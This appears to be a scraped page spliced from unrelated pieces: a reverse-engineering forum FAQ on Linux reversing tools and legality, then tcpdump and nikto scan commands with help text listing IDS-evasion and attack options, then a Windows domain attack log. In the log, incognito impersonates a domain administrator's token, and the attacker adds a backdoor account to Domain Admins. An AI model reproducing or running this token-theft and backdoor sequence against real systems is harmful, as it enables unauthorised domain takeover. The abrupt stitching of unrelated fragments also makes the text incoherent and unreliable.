http://www.reverse-engineering.net/viewtopic.php?f=35&t=7825

Hello,

A lot of intrigued reversers, new or skilled, are asking questions about Linux, don’t worry, you’re not alone 
I felt like a topic resuming common questions, well known tools shall be (re)created. That would be wonderful to have such topic to become a reference we can suggest to people asking for it, don’t you think ?
Comments and suggestions are welcome as long as you keep it informative. No chit-chat here please, only links, tips ands tricks. 

DISCLAIMER
Through this thread I am not encouraging people to hack, destroy or steal anything, you must comply with laws and you shall take entire responsability if you use this knowledge for bad behaviour. With great power (and in our information system-controlled world, every reverser, hacker, vxer has powers) comes great responsabilities. Reverse engineering is not always legal, check EULA/laws in your country. (Some interesting essays have been written on the subject, can you find them ?) A lot of companies are hiring reversers, malware analysts, win/linternals specialists for their own goods, YOU have the right to benefit this knowledge too,but don’t fall into the trap of skiddies activity.. 

Q & A

Q: I am new to reversing, can you advise me wether to choose Windows or Linux ?
A: No, for the simple reason that we cannot push you to decide what you want to do. Windows and its internals are fascinating reversers since ages, a lot of people are writing tuts, experimenting things, sharing tricks and discussing issues, Linux as well as other UNIX-like platform is less mainstream, therefore you are on your own, looking for someone that did it before, or simply threw some ideas you could investigate. But this thread could help you a bit.

Q: Ok, but what distrib should I use ?
A: If you already know linux enough (use at home/work) you can choose every flavor you like ! From RPM-style to DEB-stuff, including i-compil-everything-on-my-own, source-based distribs. If this is not the case, or if you want to use a virtual machine, please download Damn Vulnerable Linux (refer to the tool list)

Q: I am new to reversing with Linux, where should I start ?
Q: Be sure to have sufficient assembly knowledge, at least one programming language skills (C/C++ are preferable since Linux in written with it, but Perl/Python are advised. Those parts are not treated here). As for Windows with its PE file format, Linux ELF is a unconditional step for reversing. A next step could be to try some crackmes under Linux, or try some wargames to know more about this arch. |STILL UNDER CONSTRUCTION|

Q: What tool should I use to disassemble,debug my target ?
A: Nobody can force you to use this or that but Linux comes with some tools like GDB (debugger), objdump (retrieve assembly)/hexdump (retrieve hex), ltrace/ptrace/strace/utrace (investigate the program execution flow)… Please refer to the tool list and make your own opinion, manuals as well as tutorials/papers are available.

Q: I lack training with Linux and Linternals, could you help me ?
A: RTFM ! A lot of documentation about Linux inner workings are available on the net, use a search engine or check the link category. You could for example search for Linux Kernel internals.You could also train your skills with wargames or crackmes. If you need a certification for your professional activities, check this out

Q: This tool is broken/outdated/doesn’t work as I’d want, can you help me ?
A: If you think the tool is broken try to contact the author: we are not a support forum, if it’s outdated post in the Linux area and be as specific as you can, no crack requests ! We’re not providing 100% working solutions, only pointers for your own research. If you cannot use the tool correctly, if you read every documentation available about it, if you tried everything and even googled for it desperately, you can post in the Linux Area.

Q: I need something that is not on the list, I asked for help and someone told me to Google, is this is a forum or what ?
A: We (people helping) are not assisting brain-disabled people, this is a bit rude, okay, but we will only help those who showed some implications, some previous work to solve their issue, and that actually did everything possible before asking. If we found out that the answer is in the first page on Google and you still ask for a link, you’ll get in serious trouble. If you are advised so, you can request a tool/paper to be added in this list.

Q: I made a tool, would you like to include it on your list ? / My tool|paper is in this list, I don’t want it !
A: That would be a pleasure ! First, talk to the CRCETL guys over there so they can add your tool (and a local copy of it) in their great list, then notify your link to us, we will add it.
If you want some materials to be removed, contact me but remember: if it was previously, legally, accessible on the Web you can get lost..

About this

Q: This has been done before here and there (like 0xf001’s place), why reinventing the wheel ?
A: If your links contains materials we missed, please contact us, we would be delighted to add it in the list as long as it complies with our rules.As for external sites, well I have been confronted too many times to pages or links that disappeared because of domain expiration/hosting problem etc, no one is to blame, we all have a life and such activities ain’t free. To prevent this issue I highly recommend you to copy this thread to your own forum/disk/whatever.

Q: Why such strict rules about legality ? This is reversing after all, and some of your links leads to place where illegal things are discussed (hacking/vxing)
A: Reversing is not always authorized, check the EULA of your target if any available. By posting here you automatically comply with the rules and the law this board is subject to (ie. what is legal in YOUR country doesn’t mean it is everywhere on the INTERNET). This is a scientific, technical-oriented board that doesn’t focus on warez despite some subject might be borderline. This is only made to avoid getting Zero into troubles.
As for Hacking/VXing, well I am not encouraging this at all, but it is your right to get information, I am not the one to tell you what to do about it. I hope you choose to stay clean though, getting in troubles ain’t fun. And trust me you’ll get to it sooner or later.

Q: This is cool but I would prefer a step-by-step tutorial to learn what button to press and where to look, for my specific needs?
A: Then you failed at the first and the most important step: working on your own; use your brain, use Google, use the forum search function, try things, read about everything you can before asking a question on a forum. This is for your own sake, please don’t be another "I need a tutorial to pee" guy. If you lack direction or ideas, please read about +Fravia (may he rest in peace) and +HCU. They could change your view of reversing from "I press buttons on my debugger but I don’t really know what I’m doing" to the all-mighty "I can express my reversing skills in the real world, in almost every possible situation". If you get to this state of mind, I have nothing to `teach` you.

Q: Is a similar list for Windows is going to see the light some day ..?
A: I have a file in preparation, however it will not be hosted here: I’d like it to be as exhaustive as possible so it won’t comply with the rules.

Q: Hey some links are in a strange language I don’t understand, can’t you add articles in my mothertongue too ?
A: My lack of knowledge is deepless, I only speak two or three languages. If you have materials in spanish, german etc I don’t see any problem to add them here. If you are speaking languages like chinese, arab or hindi (most spoken languages on earth) a translation would be warmly welcome, if you are opposed to this idea, make your own list pal.

…UserName:Kernel@Sh…

tcpdump -i wlan0 -enn -XX -vv tcp port 80 -s 500 -w /tmp/tcpdump.bak

-i //指定网络接口 -=-=- wlan0 eth0 -=-=-
-vv //打印出更详细的信息模式
tcp //指定协议类型为TCP
port //指定端口号 -=-=- 后面跟端口号
-c //当收到count报文后退出
-s //重定义截取报文大小，默认为96（或68），如果定义为0，则表示获取完整报文。该参数应尽量小，尤其在繁忙网络环境中
-w //输出到某个文件
-XX //以16 进制数形式显示每一个报文(包含链路层报头)，同时显示ASCII码
-e //每一行显示数据链路层报文:源MAC地址>目的MAC地址，以太类型 IPV4 (0X0800), 包数据长度
host //指定域名或者机器名或者IP 者目标的 -=-=- host www.Kernel.sh -=-=-
-n //别把地址转换成名字：显示ip地址，而非主机名称
-nn //别把协议和端口号转换为服务名：譬如显示80端口而非HTTP

//输出到文件，直接查看文件比较友好一点

[arch@Archlinux ~]nikto -h www.Kernel.sh -mutate=123456 -C=’all’ -D=V -T 0123456789abcx

[arch@ArchLinux ~]$ nikto -Help

   Options:
       -config+            Use this config file
       -Cgidirs+           Scan these CGI dirs: ‘none’, ‘all’, or values like "/cgi/ /cgi-a/"
       -Display+           Turn on/off display outputs:
                               1     Show redirects
                               2     Show cookies received
                               3     Show all 200/OK responses
                               4     Show URLs which require authentication
                               D     Debug Output
                               V     Verbose Output
       -dbcheck           Check database and other key files for syntax errors (cannot be abbreviated)
       -evasion+          IDS evasion technique:
                               1     Random URI encoding (non-UTF8)
                               2     Directory self-reference (/./)
                               3     Premature URL ending
                               4     Prepend long random string
                               5     Fake parameter
                               6     TAB as request spacer
                               7     Change the case of the URL
                               8     Use Windows directory separator (\)
       -findonly          Find http(s) ports only, don’t perform a full scan
       -Format+           Save file (-o) format:
                                htm   HTML Format
                                csv   Comma-separated-value
                                txt   Plain text (default if not specified)
                                xml   XML Format
       -host+             Target host
       -Help              Extended help information
       -id+               Host authentication to use, format is userid:password
       -mutate+           Guess additional file names:
                               1     Test all files with all root directories
                               2     Guess for password file names
                               3     Enumerate user names via Apache (/~user type requests)
                               4     Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
                               5     Attempt to brute force sub-domain names, assume that the host name is the parent domain
                               6     Attempt to guess directory names from the supplied dictionary file
       -mutate-options    Provide information for mutates
       -nocache           Disables the URI cache
       -nossl             Disables using SSL
       -no404             Disables nikto attempting to guess a 404 page
       -output+           Write output to this file
       -port+             Port to use (default 80)
       -Pause+            Pause between tests (seconds)
       -root+             Prepend root value to all requests, format is /directory
       -ssl               Force ssl mode on port
       -Single            Single request mode
       -timeout+          Timeout (default 2 seconds)
       -Tuning+           Scan tuning:
                               0     File Upload
                               1     Interesting File / Seen in logs
                               2     Misconfiguration / Default File
                               3     Information Disclosure
                               4     Injection (XSS/Script/HTML)
                               5     Remote File Retrieval – Inside Web Root
                               6     Denial of Service
                               7     Remote File Retrieval – Server Wide
                               8     Command Execution / Remote Shell
                               9     SQL Injection
                               a     Authentication Bypass
                               b     Software Identification
                               c     Remote Source Inclusion
                               x     Reverse Tuning Options (i.e., include all except specified)
       -useproxy          Use the proxy defined in config.txt
       -update            Update databases and plugins from cirt.net (cannot be abbreviated)
       -Version           Print plugin and database versions
       -vhost+            Virtual host (for Host header)
   + requires a value

……

C:\WINDOWS\system32>net localgroup administrators
net localgroup administrators
Alias name  administrators
Comment     Administrators have complete and unrestricted access to the computer/domain

Members
————————————–
Administrator
BLACKHAT\Domain Admins
hacked
local_valsmith
root
The command completed successfully.

C:\WINDOWS\system32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain blackhat.com.

Group name   Domain Admins
Comment      Designated administrators of the domain

Members

—————————————————
admin_valsmith      Administrator
The command completed successfully.

c:\>incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 list_tokens -u
[*] Attempting to establish new connection to \172.16.1.10IPC$
[*] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-FC12020A7EED}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Listing unique users found…

Delegation Tokens Available
==========================================
NT AUTHORITYLOCAL SERVICE
NT AUTHORITYNETWORK SERVICE
NT AUTHORITYSYSTEM
XPCLIENTlocal_valsmith

Impersonation Tokens Available
==========================================
BLACKHATadmin_valsmith
NT AUTHORITYANONYMOUS LOGON

[*] Service shutdown detected. Service executable file deleted
[*] Deleting serviceSo admin_valsmith is our target domain administrator and an impersonation token is available to us!

C:\>incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 execute -c "blackhatadmin_valsmith" cmd

[*] Attempting to establish new connection to \172.16.1.10IPC$
[+] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-9047A294CE6D}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Searching for availability of requested token
[+] Requested token found
[-] No Delegation token available
[*] Attempting to create new child process and communicate via anonymous pipe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWS\system32>whoami
whoami
admin_valsmith

C:\>net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.

The command completed successfully.

C:\>net group "domain admins" hacked /add /domain
net group "domain admins" hacked /add /domain
The reuqest will be processed at a domain controller for domain blackhat.com

The command completed successfully.